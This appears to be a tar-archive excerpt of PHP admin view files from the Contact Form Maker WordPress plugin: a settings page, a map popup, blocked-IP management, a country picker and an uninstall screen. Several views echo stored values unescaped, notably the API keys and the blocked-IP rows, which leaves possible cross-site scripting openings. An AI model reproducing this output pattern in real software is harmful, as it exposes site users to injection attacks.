class="page_numbersform_id_temp">2/3</span></td><td valign="middle" align="right"><button id="page_next_2" type="button" class="wdform_page_button" style="cursor: pointer;">Next</button></td></tr></tbody></table></td></tr></tbody></table> <table cellpadding="4" cellspacing="0" class="wdform_table1" style="border-width: 1px; border-top-style: solid; border-top-color: black;"><tbody id="form_id_tempform_view3" page_title="Reward Drawing" class="wdform_tbody1" next_title="Next" next_type="button" next_class="wdform_page_button" next_checkable="false" previous_title="Previous" previous_type="button" previous_class="wdform_page_button" previous_checkable="false"><tr class="wdform_tr1"><td class="wdform_td1"><table class="wdform_table2"><tbody class="wdform_tbody2"><tr id="9" type="type_submitter_mail"><td colspan="2" id="9_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="9_elemet_tableform_id_temp"><tbody><tr><td valign="middle" align="left" id="9_label_sectionform_id_temp" class=""><span id="9_element_labelform_id_temp" class="label">8. Thank you for taking our survey. Your survey is almost complete, please enter your email address in the box below if you wish to participate in our drawing, then press the ''Submit'' button.</span><span id="9_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="middle" align="left" id="9_element_sectionform_id_temp" class=""><input type="hidden" value="type_submitter_mail" name="9_typeform_id_temp" id="9_typeform_id_temp"><input type="hidden" value="no" name="9_requiredform_id_temp" id="9_requiredform_id_temp"><input type="hidden" value="no" name="9_sendform_id_temp" id="9_sendform_id_temp"><input type="hidden" value="" name="9_uniqueform_id_temp" id="9_uniqueform_id_temp"><input type="text" class="input_deactive" id="9_elementform_id_temp" name="9_elementform_id_temp" value="" title="" onfocus="delete_value(''9_elementform_id_temp'')" onblur="return_value(''9_elementform_id_temp'')" onchange="change_value(''9_elementform_id_temp'')" style="width: 200px;"></td></tr></tbody></table></td></tr><tr id="10" type="type_submit_reset"><td colspan="2" class="toolbar_padding" id="10_label_and_element_sectionform_id_temp"><table id="10_elemet_tableform_id_temp"><tbody><tr><td valign="middle" align="left" id="10_label_sectionform_id_temp" class="" style="display: none;"><span id="10_element_labelform_id_temp" style="display: none;">type_submit_reset_10</span></td><td valign="middle" align="left" id="10_element_sectionform_id_temp" class=""><input type="hidden" value="type_submit_reset" name="10_typeform_id_temp" id="10_typeform_id_temp"><button type="button" class="button_submit" id="10_element_submitform_id_temp" value="Submit" onclick="check_required(''submit'', ''form_id_temp'');">Submit</button><button type="button" class="button_reset" id="10_element_resetform_id_temp" value="Reset" onclick="check_required(''reset'');" style="display: none;">Reset</button></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr valign="top" class="wdform_footer"><td colspan="100"><table width="100%"><tbody><tr id="form_id_temppage_nav3"><td valign="middle" align="left"><button id="page_previous_3" type="button" class="wdform_page_button" style="cursor: pointer;">Previous</button></td><td id="page_numbersform_id_temp3" width="100%" valign="middle" align="center"><span class="page_numbersform_id_temp">3/3</span></td></tr></tbody></table></td></tr></tbody></table>', 36, '// before form is load\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// before form submit\r\nfunction before_submit()\r\n{\r\n\r\n}\r\n\r\n// before form reset\r\nfunction before_reset()\r\n{\r\n\r\n}', '<p><span style="color: #16191e; font-family: Georgia, ''Times New Roman'', serif, sans-serif; font-size: small; line-height: 18px;">Thank you for taking our survey. Your response is very important to us.</span></p>', 'Thank you for taking our survey. Your response is very important to us.', 3, '<p>%all%</p>', '<p>%all%</p>', 11, '1#**id**#1. Please indicate if you agree or disagree with the following statements#**label**#type_matrix#****#3#**id**#2. How likely are you to recommend [Product/Service] to a friend or co-worker?#**label**#type_scale_rating#****#4#**id**#3. How satisfied are you with this [Product/Service]?#**label**#type_scale_rating#****#5#**id**#4. What would make you more satisfied with this [Product/Service]?#**label**#type_textarea#****#6#**id**#5. Do you feel our current price is merited by our product/service?#**label**#type_radio#****#7#**id**#6. What is the amount you would every pay for a product like ours#**label**#type_range#****#8#**id**#7. Please rate the product #**label**#type_star_rating#****#9#**id**#8. Thank you for taking our survey. Your survey is almost complete, please enter your email address in the box below if you wish to participate in our drawing, then press the ''Submit'' button.#**label**#type_submitter_mail#****#10#**id**#type_submit_reset_10#**label**#type_submit_reset#****##**id**##**label**##****#', '1#**id**#1. Please indicate if you agree or disagree with the following statements#**label**#type_matrix#****#3#**id**#2. How likely are you to recommend [Product/Service] to a friend or co-worker?#**label**#type_scale_rating#****#4#**id**#3. How satisfied are you with this [Product/Service]?#**label**#type_scale_rating#****#5#**id**#4. What would make you more satisfied with this [Product/Service]?#**label**#type_textarea#****#6#**id**#5. Do you feel our current price is merited by our product/service?#**label**#type_radio#****#7#**id**#6. What is the amount you would every pay for a product like ours#**label**#type_range#****#8#**id**#7. Please rate the product #**label**#type_star_rating#****#9#**id**#8. Thank you for taking our survey. Your survey is almost complete, please enter your email address in the box below if you wish to participate in our drawing, then press the ''Submit'' button.#**label**#type_submitter_mail#****#10#**id**#type_submit_reset_10#**label**#type_submit_reset#****#', 0, 'percentage', 'true', 'true', '', '', '', 0, 'testmode', '', 'USD', 0, '', '', '', '', '', '');
HEREQUERYFORM;
    $wpdb->query($form_maker_rows10);
    $wpdb->query($form_maker_rows11);
    $wpdb->query($form_maker_rows12);
  }
}

?>admin/views/FMViewFrommapeditinpopup_fmc.php000060400000007502152434416630015277 0ustar00<?php

class FMViewFrommapeditinpopup_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $model;


  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct($model) {
    $this->model = $model;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function display() {
	$fmc_settings = get_option('fmc_settings');
	$map_key = isset($fmc_settings['map_key']) ? $fmc_settings['map_key'] : '';
    $long = ((isset($_GET['long'])) ? esc_html(stripslashes($_GET['long'])) : 0);
    $lat = ((isset($_GET['lat'])) ? esc_html(stripslashes($_GET['lat'])) : 0);
    ?>
    <script src="<?php echo WD_FMC_URL . '/js/main_front_end.js'; ?>"></script>
    <script src="<?php echo WD_FMC_URL . '/js/if_gmap_back_end.js'; ?>"></script>
    <script src="https://maps.google.com/maps/api/js?v=3.exp&key=<?php echo $map_key ?>" type="text/javascript"></script>
    <table style="margin:0px; padding:0px">
      <tr>
        <td><b>Address:</b></td>
        <td><input type="text" id="addrval0" style="border:0px; background:none" size="80" readonly/></td>
      </tr>
      <tr>
        <td><b>Longitude:</b></td>
        <td><input type="text" id="longval0" style="border:0px; background:none" size="80" readonly/></td>
      </tr>
      <tr>
        <td><b>Latitude:</b></td>
        <td><input type="text" id="latval0" style="border:0px; background:none" size="80" readonly/></td>
      </tr>
    </table>
    <div id="0_elementform_id_temp" long="<?php echo $long ?>" center_x="<?php echo $long ?>" center_y="<?php echo $lat ?>" lat="<?php echo $lat ?>" zoom="8" info="" style="width:600px; height:400px; "></div>
    <script>
      if_gmap_init("0");
      add_marker_on_map(0, 0, "<?php echo $long; ?>", "<?php echo $lat; ?>", "");
    </script>
    <?php
    die();
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/views/FMViewGoptions_fmc.php000060400000012637152434416630013224 0ustar00<?php
class FMViewGoptions_fmc {
	////////////////////////////////////////////////////////////////////////////////////////
	// Events                                                                             //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Constants                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Variables                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
	private $model;

	////////////////////////////////////////////////////////////////////////////////////////
	// Constructor & Destructor                                                           //
	////////////////////////////////////////////////////////////////////////////////////////
	public function __construct($model) {
	$this->model = $model;
	}

  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
	public function display() {
		$fmc_settings = get_option('fmc_settings');
		$public_key = isset($fmc_settings['public_key']) ? $fmc_settings['public_key'] : '';
		$private_key = isset($fmc_settings['private_key']) ? $fmc_settings['private_key'] : '';
		$csv_delimiter = isset($fmc_settings['csv_delimiter']) ? $fmc_settings['csv_delimiter'] : ',';
		$map_key = isset($fmc_settings['map_key']) ? $fmc_settings['map_key'] : '';
		?>
		<div class="fm-user-manual">
			This section allows you to edit form settings.
			<a style="color: blue; text-decoration: none;" target="_blank" href="https://web-dorado.com/wordpress-form-maker-guide-2.html">Read More in User Manual</a>
		</div>
		<div class="fm-upgrade-pro">
			<a target="_blank" href="https://web-dorado.com/files/fromContactForm.php">
				<div class="fm-upgrade-img">
					UPGRADE TO PRO VERSION 
					<span></span>
				</div>
			</a>
		</div>
		<div class="fm-clear"></div>
		<form class="wrap" method="post" action="admin.php?page=goptions_fmc" style="width:99%;">
			<?php wp_nonce_field('nonce_fmc', 'nonce_fmc'); ?>     
			<div class="fm-page-header">
				<div class="fm-page-title">
					Form Settings
				</div>
				<div class="fm-page-actions">
					<button class="fm-button save-button small" onclick="if (fm_check_required('title', 'Title')) {return false;}; fm_set_input_value('task', 'save');">
						<span></span>
						Save
					</button>
				</div>
			</div>

			<table style="clear:both;">
				<tbody>
					<tr>
						<td>
							<label for="public_key">Recaptcha Site Key:</label>
						</td>
						<td>
							<input type="text" id="public_key" name="public_key" value="<?php echo $public_key; ?>" style="width:250px;" />
						</td>
						<td rowspan="2">
							<a href="https://www.google.com/recaptcha/intro/index.html" target="_blank">Get Recaptcha</a>
						</td>
					</tr>
					<tr>
						<td>
							<label for="private_key">Recaptcha Secret Key:</label>
						</td>
						<td>
							<input type="text" id="private_key" name="private_key" value="<?php echo $private_key; ?>" style="width:250px;" />
						</td>
					</tr>
					<tr>
						<td>
							<label for="public_key">Map API Key:</label>
						</td>
						<td>
							<input type="text" id="map_key" name="map_key" value="<?php echo $map_key; ?>" style="width:250px;" />
						</td>
						<td>
							<a href="https://console.developers.google.com/flows/enableapi?apiid=maps_backend&keyType=CLIENT_SIDE&reusekey=true" target="_blank">Get Map API Key</a>
						</td>
					</tr>
					<tr>
						<td>
							
						</td>
						<td>
							<span style="width:250px; display: inline-block; padding: 0 5px;">(It may take up to 5 minutes for API key change to take effect.)</span>
						</td>
						<td>
							
						</td>
					</tr>
					<tr>
						<td>
							<label for="csv_delimiter">CSV Delimiter:</label>
						</td>
						<td>
							<input type="text" id="csv_delimiter" name="csv_delimiter" value="<?php echo $csv_delimiter; ?>" style="width:50px;" />
						</td>
					</tr>
				</tbody>
			</table>
			<input type="hidden" id="task" name="task" value=""/>
		</form>
		<?php
	}



	////////////////////////////////////////////////////////////////////////////////////////
	// Getters & Setters                                                                  //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Private Methods                                                                    //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Listeners                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
}admin/views/FMViewBlocked_ips_fmc.php000060400000020331152434416630013626 0ustar00<?php

class FMViewBlocked_ips_fmc {
	////////////////////////////////////////////////////////////////////////////////////////
	// Events                                                                             //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Constants                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Variables                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
	private $model;

	////////////////////////////////////////////////////////////////////////////////////////
	// Constructor & Destructor                                                           //
	////////////////////////////////////////////////////////////////////////////////////////
	public function __construct($model) {
		$this->model = $model;
	}

	////////////////////////////////////////////////////////////////////////////////////////
	// Public Methods                                                                     //
	////////////////////////////////////////////////////////////////////////////////////////
	public function display() {
		$rows_data = $this->model->get_rows_data();
		$page_nav = $this->model->page_nav();
		$search_value = ((isset($_POST['search_value'])) ? esc_html(stripslashes($_POST['search_value'])) : '');	
		$asc_or_desc = ((isset($_POST['asc_or_desc']) && $_POST['asc_or_desc'] == 'desc') ? 'desc' : 'asc');
		$order_by_array = array('id', 'ip');
		$order_by = isset($_POST['order_by']) && in_array(esc_html(stripslashes($_POST['order_by'])), $order_by_array) ? esc_html(stripslashes($_POST['order_by'])) :  'id';
		$order_class = 'manage-column column-title sorted ' . $asc_or_desc;
		$ids_string = '';
		?>
		<div id="fm_blocked_ips_message" style="width: 99%; display: none;"></div>
		<div class="fm-user-manual">
			This section allows you to block IPs.
			<a style="color: blue; text-decoration: none;" target="_blank" href="https://web-dorado.com/wordpress-form-maker-guide-6.html">Read More in User Manual</a>
		</div>
		<div class="fm-upgrade-pro">
			<a target="_blank" href="https://web-dorado.com/files/fromContactForm.php">
				<div class="fm-upgrade-img">
					UPGRADE TO PRO VERSION 
					<span></span>
				</div>
			</a>
		</div>
		<div class="fm-clear"></div>
		<form onkeypress="fm_doNothing(event)" class="wrap" id="blocked_ips" method="post" action="admin.php?page=blocked_ips_fmc" style="width:99%;">
			<?php wp_nonce_field('nonce_fmc', 'nonce_fmc'); ?>
			<div class="fm-page-banner blocked-ips-banner">
				<div class="block_icon">
				</div>
				<div class="fm-logo-title">Blocked IPs</div>
				<div class="fm-page-actions">
					<button class="fm-button save-button small" onclick="fm_set_input_value('task', 'save_all');">
						<span></span>
						Save
					</button>
					<button class="fm-button delete-button small" onclick="if (confirm('Do you want to unblock selected IPs?')) { fm_set_input_value('task', 'delete_all'); } else { return false; }">
						<span></span>
						Delete
					</button>
				</div>
			</div>	 
			<div class="fm-clear"></div>
			<div class="tablenav top">
				<?php
					WDW_FMC_Library::search('IP', $search_value, 'blocked_ips');
					WDW_FMC_Library::html_page_nav($page_nav['total'], $page_nav['limit'], 'blocked_ips');
				?>
			</div>
			<table class="wp-list-table widefat fixed pages fm-block-ip">
				<thead>
					<tr>
						<th class="manage-column column-cb check-column table_small_col"><input id="check_all" type="checkbox" style="margin: 0;" /></th>
						<th class="table_small_col <?php if ($order_by == 'id') {echo $order_class;} ?>">
							<a onclick="fm_set_input_value('task', '');
                          fm_set_input_value('order_by', 'id');
                          fm_set_input_value('asc_or_desc', '<?php echo (($order_by == 'id' && $asc_or_desc == 'asc') ? 'desc' : 'asc'); ?>');
                          fm_form_submit(event, 'blocked_ips')" href="">
								<span>ID</span><span class="sorting-indicator"></span></th>
							</a>
						<th class="<?php if ($order_by == 'ip') {echo $order_class;} ?>">
							<a onclick="fm_set_input_value('task', '');
                          fm_set_input_value('order_by', 'ip');
                          fm_set_input_value('asc_or_desc', '<?php echo (($order_by == 'ip' && $asc_or_desc == 'asc') ? 'desc' : 'asc'); ?>');
                          fm_form_submit(event, 'blocked_ips')" href="">
							<span>IP</span><span class="sorting-indicator"></span>
							</a>
						</th>
						<th class="table_small_col">Edit</th>
						<th class="table_small_col">Delete</th>
					</tr>		  
					<tr id="tr" style="background-color: #f9f9f9;">
						<th></th>
						<th></th>
						<th>
							<input type="text" class="input_th" id="ip" name="ip" onkeypress="return fm_check_isnum(event)">
							<button class="fm-button add-button small" onclick="if (fm_check_required('ip', 'IP')) {return false;} fm_set_input_value('task', 'save'); fm_set_input_value('current_id', ''); fm_save_ip('blocked_ips');">
								Add IP
								<span></span>
							</button>
						</th>
						<th>
							
						</th>
						<th></th>
					</tr>
				</thead>
			<tbody id="tbody_arr">
			<?php
				if ($rows_data) {
					foreach ($rows_data as $row_data) {
						$alternate = (!isset($alternate) || $alternate == 'class="alternate"') ? '' : 'class="alternate"';
						?>
						<tr id="tr_<?php echo $row_data->id; ?>" <?php echo $alternate; ?>>
						<td class="table_small_col check-column" id="td_check_<?php echo $row_data->id; ?>" >
								<input id="check_<?php echo $row_data->id; ?>" name="check_<?php echo $row_data->id; ?>" type="checkbox" />
							</td>
							<td class="table_small_col" id="td_id_<?php echo $row_data->id; ?>" ><?php echo $row_data->id; ?></td>
							<td id="td_ip_<?php echo $row_data->id; ?>" >
								<a class="pointer" id="ip<?php echo $row_data->id; ?>"
							 onclick="fm_edit_ip(<?php echo $row_data->id; ?>)" 
							 title="Edit"><?php echo $row_data->ip; ?></a>
							</td>
							<td class="table_small_col" id="td_edit_<?php echo $row_data->id; ?>">
								<button class="fm-icon edit-icon" onclick="fm_edit_ip(<?php echo $row_data->id; ?>);">
									<span></span>
								</button>
							</td>
							<td class="table_small_col" id="td_delete_<?php echo $row_data->id; ?>">
								<button class="fm-icon delete-icon" onclick="if (confirm('Do you want to unblock selected IP?')) { fm_set_input_value('task', 'delete'); fm_set_input_value('current_id', <?php echo $row_data->id; ?>); fm_form_submit(event, 'blocked_ips'); } else {return false;}">
									<span></span>
								</button>
							</td>
						</tr>
						<?php
						$ids_string .= $row_data->id . ',';
					}
				}
			?>
			</tbody>
		</table>
		<input id="task" name="task" type="hidden" value="" />
		<input id="current_id" name="current_id" type="hidden" value="" />
		<input id="ids_string" name="ids_string" type="hidden" value="<?php echo $ids_string; ?>" />
		<input id="asc_or_desc" name="asc_or_desc" type="hidden" value="<?php echo $asc_or_desc; ?>" />
		<input id="order_by" name="order_by" type="hidden" value="<?php echo $order_by; ?>" />
    </form>
    <?php
	}

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/views/FMViewFromeditcountryinpopup_fmc.php000060400000021252152434416630016223 0ustar00<?php

class FMViewFromeditcountryinpopup_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $model;


  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct($model) {
    $this->model = $model;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
	public function display() {
		$id = ((isset($_GET['field_id'])) ? esc_html(stripslashes($_GET['field_id'])) : 0);
		wp_print_scripts('jquery');
		wp_print_scripts('jquery-ui-core');
		wp_print_scripts('jquery-ui-widget');
		wp_print_scripts('jquery-ui-mouse');
		wp_print_scripts('jquery-ui-slider');
		wp_print_scripts('jquery-ui-sortable');
		
		?>
		<style>
		.country-list {
			padding:10px 0;
		}
		
		.country-list ul {
			font-family: Segoe UI !important;
			font-size:13px;
		}
		.country-list > div {
			display:inline-block;
		}
		
		.save-cancel {
			float:right;
		}
		
		.fm-select-remove {
			background: #4EC0D9;
			width: 78px;
			height: 32px;
			border: 1px solid #4EC0D9;
			border-radius: 6px;
			color: #fff;
			cursor:pointer;
		}
		
		.fm-select-remove.large {
			width: 90px;
		}
		</style>
		<div class="country-list">
			<div class="select-remove">
				<button class="fm-select-remove large" onclick="select_all(); return false;">
					Select all
					<span></span>
				</button>
				<button class="fm-select-remove large" onclick="remove_all(); return false;">
					Remove all
					<span></span>
				</button>
			</div>
			<div class="save-cancel">
				<button class="fm-select-remove" onclick="save_list(); return false;">
					Save
					<span></span>
				</button>
			</div>
			<ul id="countries_list" style="list-style: none; padding: 0px;"></ul>
		</div>	
		<script>
			selec_coutries = [];
			coutries = ["", "Afghanistan", "Albania", "Algeria", "Andorra", "Angola", "Antigua and Barbuda", "Argentina", "Armenia", "Australia", "Austria", "Azerbaijan", "Bahamas", "Bahrain", "Bangladesh", "Barbados", "Belarus", "Belgium", "Belize", "Benin", "Bhutan", "Bolivia", "Bosnia and Herzegovina", "Botswana", "Brazil", "Brunei", "Bulgaria", "Burkina Faso", "Burundi", "Cambodia", "Cameroon", "Canada", "Cape Verde", "Central African Republic", "Chad", "Chile", "China", "Colombia", "Comoros", "Congo (Brazzaville)", "Congo", "Costa Rica", "Cote d'Ivoire", "Croatia", "Cuba", "Cyprus", "Czech Republic", "Denmark", "Djibouti", "Dominica", "Dominican Republic", "East Timor (Timor Timur)", "Ecuador", "Egypt", "El Salvador", "Equatorial Guinea", "Eritrea", "Estonia", "Ethiopia", "Fiji", "Finland", "France", "Gabon", "Gambia, The", "Georgia", "Germany", "Ghana", "Greece", "Grenada", "Guatemala", "Guinea", "Guinea-Bissau", "Guyana", "Haiti", "Honduras", "Hungary", "Iceland", "India", "Indonesia", "Iran", "Iraq", "Ireland", "Israel", "Italy", "Jamaica", "Japan", "Jordan", "Kazakhstan", "Kenya", "Kiribati", "Korea, North", "Korea, South", "Kuwait", "Kyrgyzstan", "Laos", "Latvia", "Lebanon", "Lesotho", "Liberia", "Libya", "Liechtenstein", "Lithuania", "Luxembourg", "Macedonia", "Madagascar", "Malawi", "Malaysia", "Maldives", "Mali", "Malta", "Marshall Islands", "Mauritania", "Mauritius", "Mexico", "Micronesia", "Moldova", "Monaco", "Mongolia", "Morocco", "Mozambique", "Myanmar", "Namibia", "Nauru", "Nepal", "Netherlands", "New Zealand", "Nicaragua", "Niger", "Nigeria", "Norway", "Oman", "Pakistan", "Palau", "Panama", "Papua New Guinea", "Paraguay", "Peru", "Philippines", "Poland", "Portugal", "Qatar", "Romania", "Russia", "Rwanda", "Saint Kitts and Nevis", "Saint Lucia", "Saint Vincent", "Samoa", "San Marino", "Sao Tome and Principe", "Saudi Arabia", "Senegal", "Serbia and Montenegro", "Seychelles", "Sierra Leone", "Singapore", "Slovakia", "Slovenia", "Solomon Islands", "Somalia", "South Africa", "Spain", "Sri Lanka", "Sudan", "Suriname", "Swaziland", "Sweden", "Switzerland", "Syria", "Taiwan", "Tajikistan", "Tanzania", "Thailand", "Togo", "Tonga", "Trinidad and Tobago", "Tunisia", "Turkey", "Turkmenistan", "Tuvalu", "Uganda", "Ukraine", "United Arab Emirates", "United Kingdom", "United States", "Uruguay", "Uzbekistan", "Vanuatu", "Vatican City", "Venezuela", "Vietnam", "Yemen", "Zambia", "Zimbabwe"];
			select_ = window.parent.document.getElementById('<?php echo $id ?>_elementform_id_temp');
			n = select_.childNodes.length;
			for (i = 0; i < n; i++) {
				selec_coutries.push(select_.childNodes[i].value);
				var ch = document.createElement('input');
					ch.setAttribute("type", "checkbox");
					ch.setAttribute("checked", "checked");
					ch.value = select_.childNodes[i].value;
					ch.id = i + "ch";

				var p = document.createElement('span');
					p.style.cssText = "color:#000000; font-size: 13px; cursor:move";
					p.innerHTML = select_.childNodes[i].value;
				var li = document.createElement('li');
					li.style.cssText = "margin:3px; vertical-align:middle";
					li.id = i;
					li.appendChild(ch);
					li.appendChild(p);
				document.getElementById('countries_list').appendChild(li);
			}
			cur = i;
			m = coutries.length;
			for (i = 0; i < m; i++) {
				isin = isValueInArray(selec_coutries, coutries[i]);
				if (!isin) {
					var ch = document.createElement('input');
						ch.setAttribute("type", "checkbox");
						ch.value = coutries[i];
						ch.id = cur + "ch";

					var p = document.createElement('span');
						p.style.cssText = "color:#000000; font-size: 13px; cursor:move";
						p.innerHTML = coutries[i];
					var li = document.createElement('li');
						li.style.cssText = "margin:3px; vertical-align:middle";
						li.id = cur;
						li.appendChild(ch);
						li.appendChild(p);
					document.getElementById('countries_list').appendChild(li);
					cur++;
				}
			}
			jQuery(function () {
				jQuery("#countries_list").sortable();
				jQuery("#countries_list").disableSelection();
			});

			function isValueInArray(arr, val) {
				inArray = false;
				for (x = 0; x < arr.length; x++) {
					if (val == arr[x]) {
						inArray = true;
					}
				}
				return inArray;
			}
			function save_list() {
				select_.innerHTML = ""
				ul = document.getElementById('countries_list');
				n = ul.childNodes.length;
				for (i = 0; i < n; i++) {
					if (ul.childNodes[i].tagName == "LI") {
						id = ul.childNodes[i].id;
						if (document.getElementById(id + 'ch').checked) {
							var option_ = document.createElement('option');
								option_.setAttribute("value", document.getElementById(id + 'ch').value);
								option_.innerHTML = document.getElementById(id + 'ch').value;
							select_.appendChild(option_);
						}
					}
				}
				window.parent.tb_remove();
			}
			function select_all() {
				for (i = 0; i < 194; i++) {
					document.getElementById(i + 'ch').checked = true;
				}
			}
			function remove_all() {
				for (i = 0; i < 194; i++) {
					document.getElementById(i + 'ch').checked = false;
				}
			}
		</script>
		<?php
		die();
	}

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/views/FMViewUninstall_fmc.php000060400000013376152434416630013374 0ustar00<?php

class FMViewUninstall_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $model;


  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct($model) {
    $this->model = $model;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
	public function display() {
		global $wpdb;
		$prefix = $wpdb->prefix;
		?>
		<form method="post" action="admin.php?page=uninstall_fmc" style="width:95%;">
			<?php wp_nonce_field('nonce_fmc', 'nonce_fmc'); ?>
			<div class="wrap">
				<div class="fm-page-banner uninstall-banner">
					<div class="uninstall_icon">
					</div>
					<div class="fm-logo-title">Uninstall Contact Form Maker</div>
				</div>	 
				<p>
					Deactivating Contact Form Maker plugin does not remove any data that may have been created, such as the Forms and the Submissions. To completely remove this plugin, you can uninstall it here.
				</p>
				<p style="color: red;">
					<strong>WARNING:</strong>
					Once uninstalled, this cannot be undone. You should use a Database Backup plugin of WordPress to back up all the data first.
				</p>
				<p style="color: red">
					<strong>The following WordPress Options/Tables will be DELETED:</strong>
				</p>
				<table class="widefat">
					<thead>
						<tr>
							<th>Database Tables</th>
						</tr>
					</thead>
					<tr>
						<td valign="top">
							<ol>
								<li><?php echo $prefix; ?>formmaker</li>
								<li><?php echo $prefix; ?>formmaker_backup</li>
								<li><?php echo $prefix; ?>formmaker_blocked</li>
								<li><?php echo $prefix; ?>formmaker_submits</li>
								<li><?php echo $prefix; ?>formmaker_views</li>
								<li><?php echo $prefix; ?>formmaker_themes</li>
								<li><?php echo $prefix; ?>formmaker_sessions</li>
								<li><?php echo $prefix; ?>formmaker_query</li>

							</ol>
						</td>
					</tr>
				</table>
				<p style="text-align: center;">
					Do you really want to uninstall Contact Form Maker?
				</p>
				<p style="text-align: center;">
					<input type="checkbox" name="Contact Form Maker" id="check_yes" value="yes" />&nbsp;<label for="check_yes">Yes</label>
				</p>
				<p style="text-align: center;">
					<input type="submit" value="UNINSTALL" class="button-primary" onclick="if (check_yes.checked) {  if (confirm('You are About to Uninstall Contact Form Maker from WordPress.\nThis Action Is Not Reversible.')) { fm_set_input_value('task', 'uninstall'); } else { return false; } } else { return false; }" />
				</p>
			</div>
			<input id="task" name="task" type="hidden" value="" />
		</form>
		<?php
	}

  public function uninstall() {
    $this->model->delete_db_tables();
    global $wpdb;
    $prefix = $wpdb->prefix;
    $deactivate_url = add_query_arg(array('action' => 'deactivate', 'plugin' => 'contact-form-maker/contact-form-maker.php'), admin_url('plugins.php'));
    $deactivate_url = wp_nonce_url($deactivate_url, 'deactivate-plugin_contact-form-maker/contact-form-maker.php');
    ?>
    <div id="message" class="updated fade">
        <p>The following Database Tables succesfully deleted:</p>
        <p><?php echo $prefix; ?>formmaker,</p>
        <p><?php echo $prefix; ?>formmaker_backup,</p>
        <p><?php echo $prefix; ?>formmaker_blocked,</p>
        <p><?php echo $prefix; ?>formmaker_sessions,</p>
        <p><?php echo $prefix; ?>formmaker_submits,</p>
        <p><?php echo $prefix; ?>formmaker_themes,</p>
        <p><?php echo $prefix; ?>formmaker_views.</p>
        <p><?php echo $prefix; ?>formmaker_query.</p>
    </div>
    <div class="wrap">
      <h2>Uninstall Contact Form Maker</h2>
      <p><strong><a href="<?php echo $deactivate_url; ?>">Click Here</a> To Finish the Uninstallation and Contact Form Maker will be Deactivated Automatically.</strong></p>
      <input id="task" name="task" type="hidden" value="" />
    </div>
  <?php
  }
  
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
